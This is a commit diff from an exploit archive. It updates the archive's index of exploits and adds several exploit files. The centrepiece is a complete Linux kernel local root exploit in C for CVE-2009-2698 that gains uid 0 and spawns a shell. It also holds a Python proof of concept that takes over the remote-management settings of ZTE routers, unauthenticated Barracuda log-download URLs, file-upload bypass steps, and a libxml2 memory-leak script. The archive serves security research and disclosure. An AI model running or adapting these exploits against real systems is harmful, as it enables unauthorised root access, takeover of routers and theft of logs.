Updated 11_18_2014

files.csv

@@ -9035,7 +9035,7 @@ id,file,description,date,author,platform,type,port
 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability",2009-09-01,Kurd-Team,php,webapps,0
 9573,platforms/windows/dos/9573.pl,"dTunes 2.72 (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0
 9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)",2009-09-02,spender,linux,local,0
-9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit",2009-09-02,Andi,linux,local,0
+9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit",2009-09-02,Andi,linux,local,0
 9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability",2009-09-02,ZhaoHuAn,php,webapps,0
 9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion Vulnerability",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0
 9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability",2009-09-02,v3n0m,php,webapps,0
@@ -31663,6 +31663,7 @@ id,file,description,date,author,platform,type,port
 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
+35146,platforms/php/webapps/35146.txt,"PHP 5.x - Bypass Disable Functions (via Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@@ -31673,6 +31674,7 @@ id,file,description,date,author,platform,type,port
 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
+35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass, Reflected XSS, Stored XSS Vulnerability",2014-11-05,"Narendra Bhati",php,webapps,0
 35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 0 - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0
 35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0
 35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
@@ -31702,19 +31704,25 @@ id,file,description,date,author,platform,type,port
 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
 35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0
+35193,platforms/php/webapps/35193.txt,"vldPersonals 2.7 – Multiple Vulnerabilities",2014-11-10,"Mr T",php,webapps,0
 35197,platforms/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0
 35198,platforms/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple XSS Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0
+35202,platforms/windows/dos/35202.py,"Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0
 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0
 35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0
 35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0"",NULL,NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0
 35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0
+35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0
 35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0
 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001
 35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80
+35214,platforms/multiple/webapps/35214.txt,"Subex FMS 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0
 35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0
 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80
+35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0
+35220,platforms/multiple/webapps/35220.txt,"Joomla HD FLV Player < 2.1.0.1 - SQL Injection Vulnerability",2014-11-13,"Claudio Viviani",multiple,webapps,0
 35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 (picture.php, rate param) - SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80
 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0
 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80
@@ -31740,4 +31748,22 @@ id,file,description,date,author,platform,type,port
 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
+35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0
+35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0
 35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0
+35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure Vulnerability",2011-01-24,"Kees Cook",multiple,remote,0
+35253,platforms/php/webapps/35253.txt,"web@all 1.1 'url' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 'module_image.php' Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 'num' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
+35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 Arbitrary File Upload Vulnerability",2011-01-25,StenoPlasma,cfm,webapps,0
+35257,platforms/php/webapps/35257.txt,"WordPress Videox7 UGC Plugin 2.5.3.2 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35258,platforms/php/webapps/35258.txt,"WordPress Audio Plugin 0.5.1 'showfile' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
+35259,platforms/php/webapps/35259.txt,"PivotX 2.2 pivotx/includes/blogroll.php color Parameter XSS",2011-01-25,"High-Tech Bridge SA",php,webapps,0
+35260,platforms/php/webapps/35260.txt,"PivotX 2.2 pivotx/includes/timwrapper.php src Parameter XSS",2011-01-25,"High-Tech Bridge SA",php,webapps,0
+35261,platforms/php/webapps/35261.txt,"RSS Feed Reader WordPress Plugin 0.1 'rss_url' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
+35262,platforms/php/webapps/35262.txt,"WordPress WP Featured Post with Thumbnail Plugin 3.0 'src' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
+35263,platforms/php/webapps/35263.txt,"WordPress WP Publication Archive Plugin 2.0.1 'file' Parameter Information Disclosure Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
+35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
+35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0

platforms/cfm/webapps/35256.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/45985/info
+
+ActiveWeb Professional is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; successful exploits will allow attackers to completely compromise the affected computer.
+
+Lomtec ActiveWeb Professional 3.0 is vulnerable; other versions may also be affected. 
+
+1. Go to the page http://www.example.com/activeweb/EasyEdit.cfm?module=EasyEdit&page=getimagefile&Filter=
+
+2. Change the 'UploadDirectory' and 'Accepted Extensions' hidden form fields to upload the malicious file to the directory of interest. 

platforms/hardware/webapps/35208.txt

@@ -0,0 +1,47 @@
+# Exploit Title: multiple Barracuda products logfile disclosure
+# Date: 03/26/2014
+# Exploit Author: Juergen Grieshofer / 4CKnowLedge
+# Author Homepage: https://4ck.eu/
+# Vendor Homepage: https://barracudalabs.com
+
+# Software Link: https://firewall.ptest.cudasvc.com/
+# Firmware v6.1.4.008 (2014-02-18 08:06:34)
+# Modell: X300Vx
+# BNSEC Nr: BNSEC-4189
+
+-- Download logs without authentication --
+$Logfiles
+https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi?password=&et=&primary_tab=LOGS&log_type=fw&auth_type=Local&user=admin&locale=de_DE&secondary_tab=bfw_fwlog&export_name=export.csv?&auth_type=Local&et=&locale=de_DE&password=&realm=&role=&user=admin&primary_tab=LOGS&filter_query_netstring={%22data%22%3A[{%22field%22%3A%22%22%2C%22operator%22%3A%22%3D%22%2C%22values%22%3A[%22%22]}]%2C%22conjunction%22%3A[%22AND%22]}
+For further logfiles replace the values of [fw, access, http, network, vpn, svc]
+
+Timeline:
+        Vendor contacted: 03/26/2014
+               Vendor generic ticket response: 03/28/2014
+                       Vendor response: 05/16/2014
+                               Vendor approved fix: 08/02/2014
+
+Advice: Update firmware to latest release
+
+
+# Software Link: https://webfilter.ptest.cudasvc.com/
+# Firmware v7.0.1.006 (2013-12-12 14:51:33)
+# Modell: 610VX
+# BNSEC Nr: BNSEC-4230, BNSEC-2528, BNSEC-4232
+
+-- Download logs without authentication --
+$Weblog
+https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=spyware_log&message_total=
+
+$Auditlog
+https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&user=admin&primary_tab=BASIC&secondary_tab=audit_log&message_total=
+
+$Infectionlog
+https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=infection_activity&message_total=
+
+Timeline:
+        Vendor contacted: 04/01/2014
+               Vendor response: 05/16/2014
+                       Vendor approved fix: 08/02/2014
+
+Advice: Update firmware to latest release
+

platforms/hardware/webapps/35272.txt

@@ -0,0 +1,62 @@
+# Exploit Title: ZTE ZXHN H108L Authentication Bypass
+# Date: 14/11/2014
+# Exploit Author: Project Zero Labs (https://projectzero.gr | 
+labs@projectzero.gr)
+# Vendor Homepage: www.zte.com.cn
+# Version: ZXHN H108LV4.0.0d_ZRQ_GR4
+# Tested on: ZTE ZXHN H108L
+# CVE : CVE-2014-8493
+
+#Original post at 
+https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/
+
+Description
+===========
+CWMP configuration is accessible only through the Administrator account. 
+CWMP is a protocol widely used by ISPs worldwide for remote provisioning 
+and troubleshooting subscribers' equipment. However editing the CWMP 
+parameters (more specifically sending the POST request) does not require 
+any user authentication.
+
+Proof of Concept
+================
+
+#!/usr/bin/python
+
+import requests
+
+acs_server = "http://<server>:<port>"
+acs_user = "user"
+acs_pass = "pass"
+
+# Connection request parameters. When a request is made to the following 
+URL, using the specified user/pass combination,
+# router will connect back to the ACS server.
+
+conn_url = "/tr069"
+conn_port = "7564"
+conn_user = "user"
+conn_pass = "pass"
+
+#Periodic inform parameters
+active = 1
+interval = 2000
+
+payload = {'CWMP_active': '1', 'CWMP_ACSURL': 
+acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 
+'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': 
+conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 
+'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': 
+active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }
+
+r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", 
+data=payload)
+
+Disclosure Timeline
+===================
+
+27/10/2014 - First communication attempt to both vendor and ISP
+04/11/2014 - ZTE response stating that ISP should be contacted
+03/11/2014 - Second attempt to contact the ISP.
+14/11/2014 - No response from ISP. Public Disclosure
+

platforms/linux/local/9575.c

@@ -1,208 +1,208 @@
-/***********************************************************
+/***********************************************************
- * hoagie_udp_sendmsg.c
+ * hoagie_udp_sendmsg.c
- * LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698
+ * LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698
- *
+ *
- * udp_sendmsg bug exploit via (*output) callback function
+ * udp_sendmsg bug exploit via (*output) callback function
- * used in dst_entry / rtable
+ * used in dst_entry / rtable
- *
+ *
- * Bug reported by Tavis Ormandy and Julien Tinnes 
+ * Bug reported by Tavis Ormandy and Julien Tinnes 
- * of the Google Security Team
+ * of the Google Security Team
- *
+ *
- * Tested with Debian Etch (r0)
+ * Tested with Debian Etch (r0)
- *
+ *
- * $ cat /etc/debian_version
+ * $ cat /etc/debian_version
- * 4.0
+ * 4.0
- * $ uname -a
+ * $ uname -a
- * Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
+ * Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
- * $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
+ * $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
- * $ ./hoagie_udp_sendmsg
+ * $ ./hoagie_udp_sendmsg
- * hoagie_udp_sendmsg.c - linux root < 2.6.19 local
+ * hoagie_udp_sendmsg.c - linux root < 2.6.19 local
- * -andi / void.at
+ * -andi / void.at
- *
+ *
- * sh-3.1# id
+ * sh-3.1# id
- * uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
+ * uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
- * sh-3.1#
+ * sh-3.1#
- *
+ *
- * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
+ * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
- * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
+ * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
- * DAMAGE DONE USING THIS PROGRAM.
+ * DAMAGE DONE USING THIS PROGRAM.
- *
+ *
- * VOID.AT Security
+ * VOID.AT Security
- * andi@void.at
+ * andi@void.at
- * http://www.void.at
+ * http://www.void.at
- *
+ *
- ************************************************************/
+ ************************************************************/
-#include <stdio.h>
+#include <stdio.h>
-#include <stdlib.h>
+#include <stdlib.h>
-#include <string.h>
+#include <string.h>
-#include <errno.h>
+#include <errno.h>
-#include <unistd.h>
+#include <unistd.h>
-#include <netinet/in.h>
+#include <netinet/in.h>
-#include <arpa/inet.h>
+#include <arpa/inet.h>
-#include <sys/socket.h>
+#include <sys/socket.h>
-#include <sys/mman.h>
+#include <sys/mman.h>
-
+
-/**
+/**
- * this code will be called from NF_HOOK via (*output) callback in kernel mode
+ * this code will be called from NF_HOOK via (*output) callback in kernel mode
- */
+ */
-void set_current_task_uids_gids_to_zero() {
+void set_current_task_uids_gids_to_zero() {
-   asm("push %eax\n"
+   asm("push %eax\n"
-       "movl $0xffffe000, %eax\n"
+       "movl $0xffffe000, %eax\n"
-       "andl %esp, %eax\n"
+       "andl %esp, %eax\n"
-       "movl (%eax), %eax\n"
+       "movl (%eax), %eax\n"
-       "movl $0x0, 0x150(%eax)\n"
+       "movl $0x0, 0x150(%eax)\n"
-       "movl $0x0, 0x154(%eax)\n"
+       "movl $0x0, 0x154(%eax)\n"
-       "movl $0x0, 0x158(%eax)\n"
+       "movl $0x0, 0x158(%eax)\n"
-       "movl $0x0, 0x15a(%eax)\n"
+       "movl $0x0, 0x15a(%eax)\n"
-       "movl $0x0, 0x160(%eax)\n"
+       "movl $0x0, 0x160(%eax)\n"
-       "movl $0x0, 0x164(%eax)\n"
+       "movl $0x0, 0x164(%eax)\n"
-       "movl $0x0, 0x168(%eax)\n"
+       "movl $0x0, 0x168(%eax)\n"
-       "movl $0x0, 0x16a(%eax)\n"
+       "movl $0x0, 0x16a(%eax)\n"
-       "pop  %eax\n");
+       "pop  %eax\n");
-}
+}
-
+
-int main(int argc, char **argv) {
+int main(int argc, char **argv) {
-   int s;
+   int s;
-   struct msghdr header;
+   struct msghdr header;
-   struct sockaddr_in sin;
+   struct sockaddr_in sin;
-   char *rtable = NULL;
+   char *rtable = NULL;
-
+
-   fprintf(stderr,
+   fprintf(stderr,
-           "hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n"
+           "hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n"
-	              "-andi / void.at\n\n");
+	              "-andi / void.at\n\n");
-
+
-   s = socket(PF_INET, SOCK_DGRAM, 0);
+   s = socket(PF_INET, SOCK_DGRAM, 0);
-   if (s == -1) {
+   if (s == -1) {
-      fprintf(stderr, "[*] can't create socket\n");
+      fprintf(stderr, "[*] can't create socket\n");
-      exit(-1);
+      exit(-1);
-   }
+   }
-
+
-   /**
+   /**
-    * initialize required variables
+    * initialize required variables
-    */
+    */
-   memset(&header, 0, sizeof(struct msghdr));
+   memset(&header, 0, sizeof(struct msghdr));
-   memset(&sin, 0, sizeof(struct sockaddr_in));
+   memset(&sin, 0, sizeof(struct sockaddr_in));
-   sin.sin_family = AF_INET;
+   sin.sin_family = AF_INET;
-   sin.sin_addr.s_addr = inet_addr("127.0.0.1");
+   sin.sin_addr.s_addr = inet_addr("127.0.0.1");
-   sin.sin_port = htons(22);
+   sin.sin_port = htons(22);
-   header.msg_name = &sin;
+   header.msg_name = &sin;
-   header.msg_namelen = sizeof(sin);
+   header.msg_namelen = sizeof(sin);
-
+
-   /**
+   /**
-    * and this is the trick:
+    * and this is the trick:
-    * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0x74)
+    * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0x74)
-    * so we map our rtable buffer at offset 0 and set output callback function
+    * so we map our rtable buffer at offset 0 and set output callback function
-    *
+    *
-    * struct dst_entry
+    * struct dst_entry
-    * {
+    * {
-    *         struct dst_entry        *next;
+    *         struct dst_entry        *next;
-    *         atomic_t                __refcnt;       client references
+    *         atomic_t                __refcnt;       client references
-    *         int                     __use;
+    *         int                     __use;
-    *         struct dst_entry        *child;
+    *         struct dst_entry        *child;
-    *         struct net_device       *dev;
+    *         struct net_device       *dev;
-    *         short                   error;
+    *         short                   error;
-    *         short                   obsolete;
+    *         short                   obsolete;
-    *         int                     flags;
+    *         int                     flags;
-    * #define DST_HOST                1
+    * #define DST_HOST                1
-    * #define DST_NOXFRM              2
+    * #define DST_NOXFRM              2
-    * #define DST_NOPOLICY            4
+    * #define DST_NOPOLICY            4
-    * #define DST_NOHASH              8
+    * #define DST_NOHASH              8
-    * #define DST_BALANCED            0x10
+    * #define DST_BALANCED            0x10
-    *         unsigned long           lastuse;
+    *         unsigned long           lastuse;
-    *         unsigned long           expires;
+    *         unsigned long           expires;
-    * 
+    * 
-    *         unsigned short          header_len;     * more space at head required *
+    *         unsigned short          header_len;     * more space at head required *
-    *         unsigned short          trailer_len;    * space to reserve at tail *
+    *         unsigned short          trailer_len;    * space to reserve at tail *
-    * 
+    * 
-    *         u32                     metrics[RTAX_MAX];
+    *         u32                     metrics[RTAX_MAX];
-    *         struct dst_entry        *path;
+    *         struct dst_entry        *path;
-    * 
+    * 
-    *         unsigned long           rate_last;      * rate limiting for ICMP *
+    *         unsigned long           rate_last;      * rate limiting for ICMP *
-    *         unsigned long           rate_tokens;
+    *         unsigned long           rate_tokens;
-    * 
+    * 
-    *         struct neighbour        *neighbour;
+    *         struct neighbour        *neighbour;
-    *         struct hh_cache         *hh;
+    *         struct hh_cache         *hh;
-    *         struct xfrm_state       *xfrm;
+    *         struct xfrm_state       *xfrm;
-    * 
+    * 
-    *         int                     (*input)(struct sk_buff*);
+    *         int                     (*input)(struct sk_buff*);
-    *         int                     (*output)(struct sk_buff*);
+    *         int                     (*output)(struct sk_buff*);
-    * 
+    * 
-    * #ifdef CONFIG_NET_CLS_ROUTE
+    * #ifdef CONFIG_NET_CLS_ROUTE
-    *         __u32                   tclassid;
+    *         __u32                   tclassid;
-    * #endif
+    * #endif
-    * 
+    * 
-    *         struct  dst_ops         *ops;
+    *         struct  dst_ops         *ops;
-    *         struct rcu_head         rcu_head;
+    *         struct rcu_head         rcu_head;
-    * 
+    * 
-    *         char                    info[0];
+    *         char                    info[0];
-    * };
+    * };
-    *
+    *
-    * struct rtable
+    * struct rtable
-    * {
+    * {
-    *         union
+    *         union
-    *         {
+    *         {
-    *                 struct dst_entry        dst;
+    *                 struct dst_entry        dst;
-    *                 struct rtable           *rt_next;
+    *                 struct rtable           *rt_next;
-    *         } u;
+    *         } u;
-    *
+    *
-    *         struct in_device        *idev;
+    *         struct in_device        *idev;
-    *
+    *
-    *         unsigned                rt_flags;
+    *         unsigned                rt_flags;
-    *         __u16                   rt_type;
+    *         __u16                   rt_type;
-    *         __u16                   rt_multipath_alg;
+    *         __u16                   rt_multipath_alg;
-    *
+    *
-    *         __be32                  rt_dst; * Path destination     *
+    *         __be32                  rt_dst; * Path destination     *
-    *         __be32                  rt_src; * Path source          *
+    *         __be32                  rt_src; * Path source          *
-    *         int                     rt_iif;
+    *         int                     rt_iif;
-    *
+    *
-    *         * Info on neighbour *
+    *         * Info on neighbour *
-    *         __be32                  rt_gateway;
+    *         __be32                  rt_gateway;
-    *
+    *
-    *         * Cache lookup keys *
+    *         * Cache lookup keys *
-    *         struct flowi            fl;
+    *         struct flowi            fl;
-    *
+    *
-    *         * Miscellaneous cached information *
+    *         * Miscellaneous cached information *
-    *          __be32                  rt_spec_dst; * RFC1122 specific destination *
+    *          __be32                  rt_spec_dst; * RFC1122 specific destination *
-    *         struct inet_peer        *peer; * long-living peer info *
+    *         struct inet_peer        *peer; * long-living peer info *
-    * };
+    * };
-    *
+    *
-    */
+    */
-   rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
+   rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
-   if (rtable == MAP_FAILED) {
+   if (rtable == MAP_FAILED) {
-      fprintf(stderr, "[*] mmap failed\n");
+      fprintf(stderr, "[*] mmap failed\n");
-      exit(-1);
+      exit(-1);
-   }
+   }
-   *(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;
+   *(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;
-
+
-   /* trigger exploit
+   /* trigger exploit
-    *
+    *
-    * the second sendmsg() call will call ip_append_data() with rt == NULL
+    * the second sendmsg() call will call ip_append_data() with rt == NULL
-    * because of:
+    * because of:
-    * if (up->pending) {
+    * if (up->pending) {
-    *          *
+    *          *
-    *          * There are pending frames.
+    *          * There are pending frames.
-    *          * The socket lock must be held while it's corked.
+    *          * The socket lock must be held while it's corked.
-    *          *
+    *          *
-    *          lock_sock(sk);
+    *          lock_sock(sk);
-    *          if (likely(up->pending)) {
+    *          if (likely(up->pending)) {
-    *                    if (unlikely(up->pending != AF_INET)) {
+    *                    if (unlikely(up->pending != AF_INET)) {
-    *                            release_sock(sk);
+    *                            release_sock(sk);
-    *                            return -EINVAL;
+    *                            return -EINVAL;
-    *                    }
+    *                    }
-    *                    goto do_append_data;
+    *                    goto do_append_data;
-    *            }
+    *            }
-    *            release_sock(sk);
+    *            release_sock(sk);
-    *    }
+    *    }
-    *
+    *
-    */
+    */
-   sendmsg(s, &header, MSG_MORE|MSG_PROXY);
+   sendmsg(s, &header, MSG_MORE|MSG_PROXY);
-   sendmsg(s, &header, 0);
+   sendmsg(s, &header, 0);
-
+
-   close(s);
+   close(s);
-
+
-   system("/bin/sh");
+   system("/bin/sh");
-
+
-   return 0;
+   return 0;
-}
+}
-
+
-// milw0rm.com [2009-09-02]
+// milw0rm.com [2009-09-02]

platforms/multiple/remote/35252.php

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/45973/info
+
+The 'libxml2' library is prone to a local information-disclosure vulnerability.
+
+Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
+
+<?php 
+# Copyright 2010, Canonical, Ltd. 
+# Author: Kees Cook <kees@ubuntu.com> 
+# License: GPLv3 
+# 
+# Proof-of-concept memory content leak 
+
+$xw = new XMLWriter(); 
+$xw->openURI('php://output'); 
+
+$xw->startElement('input'); 
+$xw->writeAttribute('value', "\xe0\x81"); 
+$xw->endElement(); 
+
+?>

platforms/multiple/webapps/35214.txt

@@ -0,0 +1,38 @@
+=======================================================================================
+Subex ROC Fraud Management System v7.4 - Unauthenticated Blind-Time Based SQL Injection
+=======================================================================================
+
+Affected Software: Subex ROC FMS v7.4 (and probably earlier versions)
+Vendor Homepage		: http://www.subex.com/
+Version			: 7.4
+Remote			: Remote
+Severity		: Very High
+Discovered by		: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
+CVE 			: CVE-2014-8728
+
+
+[Summary]
+A parameter at the login page of Subex ROC Fraud Management platform is vulnerable to blind-time based SQL injection.
+
+
+[Vulnerability Details]
+Authentication	: The exploitation can be performed by any unauthenticated user.
+Page 		: http://ip:port/login/login
+Backend DB 	: Oracle
